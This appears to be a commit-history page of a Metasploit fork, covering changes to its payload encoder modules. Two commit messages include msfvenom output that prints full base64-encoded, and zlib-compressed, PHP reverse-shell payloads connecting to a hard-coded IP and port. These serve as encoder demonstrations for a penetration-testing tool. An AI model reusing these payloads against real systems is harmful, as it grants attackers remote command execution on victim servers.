adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
77,971 Commits 27 Branches 1,043 Tags
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
Commit Graph

286 Commits

Author SHA1 Message Date
cgranleese-r7 04a18fb3ca Updates modules to remove non-printable chars 2025-06-25 14:19:56 +01:00
bcoles 1b4d65e8b7 Encoders: Fix assemble method Metasm CPU definition 2025-05-26 23:03:12 +10:00
bcoles d85ccb2da1 modules/encoders: Resolve RuboCop violations 2025-04-14 00:10:31 +10:00
h00die-gr3y 9a60caf36d added comment with explanation 2025-03-31 09:36:01 +00:00
h00die-gr3y dde6bdc211 bug fix cmd encoder base64 2025-03-30 11:11:00 +00:00
Jack Heysel 93ddceb929 Land #19419, Remove unneeded code in php/base64 
This remove some useless code in modules/encoders/php/base64.rb
 2024-09-05 11:00:56 -07:00
jvoisin 5b94c7e2d4 Add an encoder to minify php payloads 
```console
$ ./msfvenom --platform php -a php -p php/reverse_php | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 3010 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4052 (iteration=0)
php/base64 chosen with final size 4052
Payload size: 4052 bytes

No syntax errors detected in Standard input code
$ ./msfvenom --platform php -a php -p php/reverse_php -e php/minify | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2109 (iteration=0)
php/minify chosen with final size 2109
Payload size: 2109 bytes

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2839 (iteration=0)
php/base64 chosen with final size 2839
Payload size: 2839 bytes

No syntax errors detected in Standard input code
$
```
 2024-09-01 23:09:47 +02:00
Spencer McIntyre a22db071f0 Appease rubocop 2024-08-28 10:46:48 -04:00
jvoisin 24750deab3 Add modules/encoders/php/hex.rb 
This one increases the size of the payload by a bit more than a factor two,
but should be able to generate a valid encoded payload in some pathological
BADCHAR situations where modules/encoders/php/base64.rb can't.
 2024-08-28 12:19:04 +02:00
Jack Heysel 49d382692a Land #19377, Add compressinon to php/base64 
This enables users to set a datastore option in enocoders/php/base64
which will compress the payload using zlib, greatly reducing its size
 2024-08-27 10:27:45 -04:00
jheysel-r7 573643a7b4 Update modules/encoders/php/base64.rb 2024-08-26 16:35:29 -04:00
jvoisin 656c8fd4fb Remove some useless code in modules/encoders/php/base64.rb 
The payload is always quoted since 975de9d479, so
there is no need to care if the first character is alpha or not.
This has some chance to make the payload 5 chars smaller, woo!
 2024-08-26 22:21:27 +02:00
jvoisin 18ee2cde77 Add the possibility the compress the payload in encoders/php/base64 
Without compression:

```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4040 (iteration=0)
php/base64 chosen with final size 4040
Payload size: 4040 bytes
eval(base64_decode('ICAgIC8qPD9waHAgLyoqLwogICAgICBAZXJyb3JfcmVwb3J0aW5nKDApO0BzZXRfdGltZV9saW1pdCgwKTtAaWdub3JlX3VzZXJfYWJvcnQoMSk7QGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7CiAgICAgICRkaXM9QGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CiAgICAgIGlmKCFlbXB0eSgkZGlzKSl7CiAgICAgICAgJGRpcz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCcsJywkZGlzKTsKICAgICAgICAkZGlzPWV4cGxvZGUoJywnLCRkaXMpOwogICAgICAgICRkaXM9YXJyYXlfbWFwKCd0cmltJywkZGlzKTsKICAgICAgfWVsc2V7CiAgICAgICAgJGRpcz1hcnJheSgpOwogICAgICB9CiAgICAgIAogICAgJGlwYWRkcj0nMTAwLjExOS4xOTcuMjEnOwogICAgJHBvcnQ9NDQ0NDsKCiAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdlbXJvckVjdFlWZWYnKSl7CiAgICAgIGZ1bmN0aW9uIGVtcm9yRWN0WVZlZigkYyl7CiAgICAgICAgZ2xvYmFsICRkaXM7CiAgICAgICAgCiAgICAgIGlmIChGQUxTRSAhPT0gc3RyaXN0cihQSFBfT1MsICd3aW4nICkpIHsKICAgICAgICAkYz0kYy4iIDI.chr(43).JjFcbiI7CiAgICAgIH0KICAgICAgJER5Rk89J2lzX2NhbGxhYmxlJzsKICAgICAgJGVrTXV5WkY9J2luX2FycmF5JzsKICAgICAgCiAgICAgIGlmKCREeUZPKCdwb3BlbicpJiYhJGVrTXV5.WkYoJ3BvcGVuJywkZGlzKSl7CiAgICAgICAgJGZwPXBvcGVuKCRjLCdyJyk7CiAgICAgICAgJG89TlVMTDsKICAgICAgICBpZihpc19yZXNvdXJjZSgkZnApKXsKICAgICAgICAgIHdoaWxlKCFmZW9mKCRmcCkpewogICAgICAgICAgICAkby49ZnJlYWQoJGZwLDEwMjQpOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAcGNsb3NlKCRmcCk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdzaGVsbF9leGVjJykmJiEkZWtNdXlaRignc2hlbGxfZXhlYycsJGRpcykpewogICAgICAgICRvPWAkY2A7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdwcm9jX29wZW4nKSYmISRla011eVpGKCdwcm9jX29wZW4nLCRkaXMpKXsKICAgICAgICAkaGFuZGxlPXByb2Nfb3BlbigkYyxhcnJheShhcnJheSgncGlwZScsJ3InKSxhcnJheSgncGlwZScsJ3cnKSxhcnJheSgncGlwZScsJ3cnKSksJHBpcGVzKTsKICAgICAgICAkbz1OVUxMOwogICAgICAgIHdoaWxlKCFmZW9mKCRwaXBlc1sxXSkpewogICAgICAgICAgJG8uPWZyZWFkKCRwaXBlc1sxXSwxMDI0KTsKICAgICAgICB9CiAgICAgICAgQHByb2NfY2xvc2UoJGhhbmRsZSk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdleGVjJykmJiEkZWtNdXlaRignZXhlYycsJGRpcykpewogICAgICAgICRvPWFycmF5KCk7CiAgICAgICA.gZXhlYygkYywkbyk7CiAgICAgICAgJG89am9pbihjaHIoMTApLCRvKS5jaHIoMTApOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygnc3lzdGVtJykmJiEkZWtNdXlaRignc3lzdGVtJywkZGlzKSl7CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBzeXN0ZW0oJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygncGFzc3RocnUnKSYmISRla011eVpGKCdwYXNzdGhydScsJGRpcykpewogICAgICAgIG9iX3N0YXJ0KCk7CiAgICAgICAgcGFzc3RocnUoJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICB7CiAgICAgICAgJG89MDsKICAgICAgfQogICAgCiAgICAgICAgcmV0dXJuICRvOwogICAgICB9CiAgICB9CiAgICAkbm9mdW5jcz0nbm8gZXhlYyBmdW5jdGlvbnMnOwogICAgaWYoaXNfY2FsbGFibGUoJ2Zzb2Nrb3BlbicpYW5kIWluX2FycmF5KCdmc29ja29wZW4nLCRkaXMpKXsKICAgICAgJHM9QGZzb2Nrb3BlbigidGNwOi8vMTAwLjExOS4xOTcuMjEiLCRwb3J0KTsKICAgICAgd2hpbGUoJGM9ZnJlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJG.MsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1aXQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgZndyaXRlKCRzLCRub2Z1bmNzKTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGZ3cml0ZSgkcywkb3V0KTsKICAgICAgfQogICAgICBmY2xvc2UoJHMpOwogICAgfWVsc2V7CiAgICAgICRzPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7CiAgICAgIEBzb2NrZXRfY29ubmVjdCgkcywkaXBhZGRyLCRwb3J0KTsKICAgICAgQHNvY2tldF93cml0ZSgkcywic29ja2V0X2NyZWF0ZSIpOwogICAgICB3aGlsZSgkYz1Ac29ja2V0X3JlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1a.XQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgQHNvY2tldF93cml0ZSgkcywkbm9mdW5jcyk7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAc29ja2V0X3dyaXRlKCRzLCRvdXQsc3RybGVuKCRvdXQpKTsKICAgICAgfQogICAgICBAc29ja2V0X2Nsb3NlKCRzKTsKICAgIH0K'));
$
```

With compression:

```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1617 (iteration=0)
php/base64 chosen with final size 1617
Payload size: 1617 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ.chr(47).p5fQRtCSGWabaUGts7jlqBIsaFZE8zZh64rWJk6xWxlUiUpxEbb.chr(47).z5QbxYtdykw7NtswLLvnjvdPffoaIQQmp79.chr(43).HOxLtD07Gx6gqrXBWitNNNQKG2FvCezcHFhwDIrNsBysRG2Mol7qTSw0oBmyUppS2JnlYIZsARvki2DLfDSCiWrWBzNwkVzkyAVhlbgewdOhUlWObCslNzhDe6QIiMj2BR2R1xMGH5s7E2OQsO9qzVPOBA8fR2hN99MceTeFX7hw2Fb5CoF8iV.chr(47).onWyY5ukINhqsTkAfYbcwMcjEWQPaa7VJRBFkqaa4ng2m8Tx00n89LvJeYxrcOAIpvP5fL44OWlbbRlgsBXGGoJ3Lwp79QHvG28RqPaQgPc4uc.chr(47).VKsmryvaddUwi8vzyenmFRpQiY7UwVpPbX27ZzTJC.chr(43).EFIjMIQ9frjNOCTMTr.chr(47).6TT.chr(43).S44PWwzyd6.chr(47).ubhTFwjCe5LmbIO4G.chr(47).OftK7WjWEhWMdQ59mNt4gl2MsHh6emoDmoM0WDe6pBshBySBDwKVH.chr(43).Sir5TQhK.chr(43).1iSehc45ab57kzxSillDnrNBQT3zsbLeBvztY5kLrThTBUgv8d46zLtOZJoD7SCuz5qA.chr(43).hMXogAcYY3DyLc8HLOEUeB.chr(43).GJ.chr(43).ol39cX.chr(43).8ND2uRAxlloDJSo1.chr(47).Hb.chr(47).pFuZgJzTQk6R4QxbPzeS.chr(47).t5.chr(43).7bRVU8z5UB0vTz.chr(43).Ah2xsLGp782DShSK2Zsom1fETXWPRVen2rlNg3jSlqQ1vQj1IqBTBnPIZHk0fKKxBi71qU.chr(47).xtb4VSW26P.chr(43).wyKHQviCyrKBFKy6npH8Qh8iIMEyDUaXmQIKs8JXhiefQ6QknKw4l0xdNXz6NdLLiaMveQzjz91Pn0mBLLVGgfH.chr(47).9GUjl9qmhWKpqmaD9.EbRol3JvvxGcGcXf1.chr(47).QmMh21.chr(43).63vOGA5MPSic5Kx5cUP06l.chr(47).Ioyj6jDomqypDHhLmInOZ.chr(47).Pv.chr(47).a1TWkQRxt58TLlyOz3g0Sx6EiJKEeYpwt4k.chr(43).DoVuod8En0bh.chr(47).2nFzmGq9Oin25ep.chr(47).tQCovRp0.chr(47).oiA.chr(43).2wuL.chr(43).AYLQSkPyvpfbP0DrNmhzkPUz.chr(43).iXV4nZQSrMkN3AgrexBCwuOpnaeXvCgjONq62VRpR2c6FmjxTa314ubsRuxe3o1JBbI5XP268uru2h58.chr(43).wFW979fnX5W7S8uWZ3z2671F2IkhK4rW5d.chr(47).2U40EML7CocezcbD4XTRvyvn6.chr(47).Qz4DefyOjYTJV2shYnbst65Q1kFangwOFnfwNAM8OCw')));
$
```

Let's not enable it by default as it relies on having php compiled with zlib by
default, which might not be available on come exotic setups.
 2024-08-13 23:10:04 +02:00
jvoisin d28fb4cbb6 Fix php/base64 encoder 
Having things like `'abcde.chr(43).fgh'` doesn't fly, but `'abcde'.chr(43).'fgh'` does.
 2024-08-09 12:07:39 -07:00
Spencer McIntyre 111d329609 Fix the powershell_base64 encoder 2024-06-13 15:46:02 -04:00
Spencer McIntyre 1cd5b707bb Add additional platforms and decoders 2024-02-13 18:34:40 +01:00
Spencer McIntyre 49e689d909 Some improvements to the encoder 
* Skip encoding when it is not necessary
* Use command -v instead of which for portability
 2024-02-13 18:34:40 +01:00
Spencer McIntyre 9c6e1a584a Add a base64 ARCH_CMD encoder 2024-02-13 18:34:40 +01:00
Spencer McIntyre b31abcc9b2 Mark unix encoders as compatible with linux 
Fixes #18572
 2024-01-19 13:40:43 -05:00
h00die 04c0dede5e fix spelling in some modules 2024-01-07 14:06:31 -05:00
Grant Willcox 7728e1e2fb Add in new library function for escaping PowerShell literals 2023-06-02 10:22:56 -05:00
Grant Willcox 965311d09e Fix documentation and fix bug in creating PARMS value 2023-06-02 09:48:02 -05:00
Grant Willcox 3ab4173d6c Fix up base64 encoder to properly quote strings - credit to @smcintyre-r7 for the fix 2023-06-02 09:48:02 -05:00
wvu f5bec517a0 Escape braces after all in cmd/brace encoder 
Previously escaped only commas.
 2023-05-25 23:46:18 -05:00
Arthur RAOUT 889aff9701 Revert accidental changes Merge branch 'upstream-master' into New_x86_xor_encoder 2023-03-08 13:41:26 +01:00
Grant Willcox 975de9d479 Supply exception message when raising BadcharError and fix typo 2023-03-02 17:46:21 -06:00
jvoisin 5b82c952ba Rubocop pass 2023-03-02 21:43:41 +01:00
jvoisin ae549ce1d4 Fix PHP base64 encoding 2023-03-02 21:40:27 +01:00
Arthur RAOUT 7b7377257e fixed 2 rubocop offenses 2023-03-02 13:08:09 +01:00
Arthur RAOUT e178226efa Merge branch 'New_x86_xor_encoder' of github.com:araout42/metasploit-framework into New_x86_xor_encoder 2023-03-02 12:31:21 +01:00
Arthur RAOUT 1461f9fb03 slight changes in the comments 2023-03-02 12:30:38 +01:00
Professor Araout 83bcd1cc1b Fix typo in the comments line 41 
Co-authored-by: Brendan <bwatters@rapid7.com>
 2023-03-02 11:50:56 +01:00
Arthur RAOUT d83c2c3a5d Remove useless loop that select reg1, because we now have push/pop all regs to preserve them 2023-01-04 17:40:22 +01:00
Arthur RAOUT 676fda73b1 Remove useless loop that select reg1, because we now have push/pop all regs to preserve them 2023-01-04 17:39:59 +01:00
Arthur RAOUT 7494318ec4 Fix offset from entrypoint 2023-01-04 17:36:55 +01:00
Arthur RAOUT 93f579b180 Fixed shuffling of registers with generate preserve reg function 2023-01-04 17:33:24 +01:00
Arthur RAOUT 0a99e2be6a Fixed 3 offense rubocop/msftidy 2023-01-04 17:25:25 +01:00
Arthur RAOUT bdf5f8fbe4 Added preserver register through random order push and pop of the registers, change name to xor_poly.rb 2023-01-04 17:21:48 +01:00
Professor Araout 0a53cab369 Update xor.rb 
Remove outdated comments
 2022-12-20 17:03:50 +01:00
Arthur RAOUT 45d0eb8bb4 Add encoder module x86/xor at path modules/encoder/x86/xor.rb, Rubocop clean, msftidy clean, No documentation written 2022-12-20 15:54:01 +01:00
gwillcox-r7 1d3f0be495 RuboCop unicode_upper.rb and unicode_mixed.rb 2020-05-02 21:51:05 -05:00
gwillcox-r7 123d33679a Fix Unicode encoders to meet RuboCop standards 2020-05-02 21:36:10 -05:00
Paolo 'VoidSec' Stagno 5db675a683 changed in OptString 2020-05-02 15:14:38 +02:00
Paolo 'VoidSec' Stagno aeebe6e0f1 fixing text description 2020-05-01 16:48:43 +02:00
Paolo 'VoidSec' Stagno 90304c5ced Unicode Encoders, 'Buffer Register' fixes 
https://github.com/rapid7/metasploit-framework/issues/13372
 2020-05-01 16:41:30 +02:00
O . S . O 51fe61838d Create xor_context.rb 2019-07-01 10:36:08 +02:00
Brendan Coles 5957315167 Land #11141, Ensure Byte XORi Encoder uses cacheflush() 2018-12-29 10:20:07 +00:00
Pedro Ribeiro 1e88ce9a3d Edit the comments to -84 2018-12-18 16:33:44 +00:00
Pedro Ribeiro 05218654f4 adjust the offset to -84 2018-12-18 16:30:47 +00:00
Pedro Ribeiro af418ec7f7 Fix mipsle byte_xori too 2018-12-18 16:05:23 +00:00